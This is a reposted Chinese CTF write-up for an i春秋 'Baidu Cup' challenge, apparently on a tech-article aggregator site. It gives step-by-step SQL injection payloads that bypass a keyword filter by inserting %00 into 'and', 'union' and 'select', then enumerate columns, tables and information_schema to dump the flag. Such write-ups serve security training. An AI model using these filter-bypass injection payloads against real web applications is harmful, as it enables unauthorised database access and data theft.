IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> i春秋 “百度杯”CTF比赛 九月场 SQL %00截断绕过 -> 正文阅读

[大数据]i春秋 “百度杯”CTF比赛 九月场 SQL %00截断绕过

题目

?

不走就不走

?直接注入

id=1?and?1=2

?怀疑过滤,尝试到%00 截断是否能过滤。

(这里讲解下过滤知识)

本题是后端是通过匹配and select 等字符串来进行匹配的,在and中加入%00,为a%00nd 可以绕过匹配,但实际运行中服务器会将%00解析为空,这样就可实现绕过。

?id=1 a%00nd 1=2

?无回显,判断存在注入,且为字符型注入。

order by 1~99 获取 数据库字段长度()

?id=1 or%00der by 4

?到4出现异常回显,判断数据库字段为3.

爆可注入字段名(union 也要加%00)

?id=1 u%00nion se%00lect 1,2,3

?第2个参数位置可注入

爆数据库名

?id=1 u%00nion se%00lect 1,database(),3

?爆表名

?id=1 u%00nion se%00lect 1,table_name,3  from information_schema.tables where table_schema='sqli'

得到表名 info 和 users

先爆info

?id=1 u%00nion se%00lect 1,group_concat(column_name),3  from information_schema.columns where table_name='info'

?

得到字段名? 肯定先选flAg_T5ZNdrm

爆出flAg_T5ZNdrm 改字段的值

?id=1 u%00nion se%00lect 1,flAg_T5ZNdrm,3  from info

?

得到Flag

  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2021-12-02 16:50:07  更:2021-12-02 16:50:54 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/24 9:02:08-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码